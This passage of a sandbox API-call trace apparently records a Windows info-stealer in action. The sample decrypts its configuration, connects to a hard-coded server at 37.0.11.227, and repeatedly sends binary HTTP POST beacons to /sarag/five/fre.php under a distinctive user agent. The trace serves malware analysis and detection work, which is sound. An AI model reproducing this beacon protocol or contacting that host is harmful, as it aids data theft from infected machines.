dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0242.630] GetProcessHeap () returned 0x690000 [0242.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.630] GetProcessHeap () returned 0x690000 [0242.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.631] GetProcessHeap () returned 0x690000 [0242.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc88) returned 0x66c [0242.638] Sleep (dwMilliseconds=0xea60) [0242.640] GetProcessHeap () returned 0x690000 [0242.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0242.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0242.656] GetProcessHeap () returned 0x690000 [0242.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0242.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.657] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0242.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.658] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.659] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.659] GetProcessHeap () returned 0x690000 [0242.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0242.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.660] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0242.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.661] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0242.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.662] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0242.662] GetProcessHeap () returned 0x690000 [0242.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0242.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.663] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.667] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.667] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.667] GetProcessHeap () returned 0x690000 [0242.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0242.667] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.668] GetProcessHeap () returned 0x690000 [0242.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0242.671] GetProcessHeap () returned 0x690000 [0242.671] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0242.671] GetProcessHeap () returned 0x690000 [0242.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.672] GetProcessHeap () returned 0x690000 [0242.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0242.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0242.690] GetProcessHeap () returned 0x690000 [0242.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0242.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.692] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0242.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.693] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.695] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.695] GetProcessHeap () returned 0x690000 [0242.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0242.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.697] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0242.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.701] CryptDestroyKey (hKey=0x69d628) returned 1 [0242.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.702] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0242.703] GetProcessHeap () returned 0x690000 [0242.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.704] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0242.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.705] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0242.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.706] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0242.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.708] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0242.708] GetProcessHeap () returned 0x690000 [0242.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0242.708] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0242.708] GetProcessHeap () returned 0x690000 [0242.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0242.708] socket (af=2, type=1, protocol=6) returned 0x670 [0242.711] connect (s=0x670, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0242.733] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0242.733] GetProcessHeap () returned 0x690000 [0242.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0242.733] GetProcessHeap () returned 0x690000 [0242.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0242.734] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.735] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.735] GetProcessHeap () returned 0x690000 [0242.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0242.735] GetProcessHeap () returned 0x690000 [0242.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.735] GetProcessHeap () returned 0x690000 [0242.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0242.735] GetProcessHeap () returned 0x690000 [0242.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0242.736] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.737] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.737] GetProcessHeap () returned 0x690000 [0242.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0242.737] GetProcessHeap () returned 0x690000 [0242.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.737] send (s=0x670, buf=0x6ad508*, len=242, flags=0) returned 242 [0242.738] send (s=0x670, buf=0x6aba40*, len=159, flags=0) returned 159 [0242.738] GetProcessHeap () returned 0x690000 [0242.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0242.738] recv (in: s=0x670, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0242.809] GetProcessHeap () returned 0x690000 [0242.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0242.809] GetProcessHeap () returned 0x690000 [0242.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0242.810] GetProcessHeap () returned 0x690000 [0242.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0242.812] GetProcessHeap () returned 0x690000 [0242.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0242.812] closesocket (s=0x670) returned 0 [0242.813] GetProcessHeap () returned 0x690000 [0242.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0242.813] GetProcessHeap () returned 0x690000 [0242.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.813] GetProcessHeap () returned 0x690000 [0242.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.814] GetProcessHeap () returned 0x690000 [0242.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1358) returned 0x670 [0242.832] Sleep (dwMilliseconds=0xea60) [0242.834] GetProcessHeap () returned 0x690000 [0242.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0242.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0242.872] GetProcessHeap () returned 0x690000 [0242.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0242.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.873] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0242.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.885] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.886] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.886] GetProcessHeap () returned 0x690000 [0242.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0242.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.890] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0242.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.891] CryptDestroyKey (hKey=0x69d628) returned 1 [0242.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.892] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0242.892] GetProcessHeap () returned 0x690000 [0242.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.893] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.895] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.896] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.897] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.897] GetProcessHeap () returned 0x690000 [0242.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0242.897] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.900] GetProcessHeap () returned 0x690000 [0242.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.901] GetProcessHeap () returned 0x690000 [0242.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.901] GetProcessHeap () returned 0x690000 [0242.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.902] GetProcessHeap () returned 0x690000 [0242.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0242.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0242.913] GetProcessHeap () returned 0x690000 [0242.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0242.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.915] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0242.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.916] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.916] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.917] GetProcessHeap () returned 0x690000 [0242.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0242.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.918] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0242.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.919] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0242.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.923] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0242.923] GetProcessHeap () returned 0x690000 [0242.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.924] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0242.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.926] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0242.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.927] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0242.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.928] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0242.928] GetProcessHeap () returned 0x690000 [0242.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0242.928] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0242.928] GetProcessHeap () returned 0x690000 [0242.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0242.928] socket (af=2, type=1, protocol=6) returned 0x674 [0242.929] connect (s=0x674, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0242.956] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0242.956] GetProcessHeap () returned 0x690000 [0242.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0242.956] GetProcessHeap () returned 0x690000 [0242.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0242.956] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.957] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.957] GetProcessHeap () returned 0x690000 [0242.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0242.957] GetProcessHeap () returned 0x690000 [0242.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.958] GetProcessHeap () returned 0x690000 [0242.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0242.958] GetProcessHeap () returned 0x690000 [0242.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0242.959] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.959] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.959] GetProcessHeap () returned 0x690000 [0242.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0242.959] GetProcessHeap () returned 0x690000 [0242.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.960] send (s=0x674, buf=0x6ad508*, len=242, flags=0) returned 242 [0242.960] send (s=0x674, buf=0x6aba40*, len=159, flags=0) returned 159 [0242.961] GetProcessHeap () returned 0x690000 [0242.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0242.961] recv (in: s=0x674, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0243.040] GetProcessHeap () returned 0x690000 [0243.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0243.041] GetProcessHeap () returned 0x690000 [0243.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0243.041] GetProcessHeap () returned 0x690000 [0243.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0243.042] GetProcessHeap () returned 0x690000 [0243.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0243.042] closesocket (s=0x674) returned 0 [0243.043] GetProcessHeap () returned 0x690000 [0243.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0243.043] GetProcessHeap () returned 0x690000 [0243.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.043] GetProcessHeap () returned 0x690000 [0243.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.044] GetProcessHeap () returned 0x690000 [0243.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0243.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xaf0) returned 0x674 [0243.047] Sleep (dwMilliseconds=0xea60) [0243.049] GetProcessHeap () returned 0x690000 [0243.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0243.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.051] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 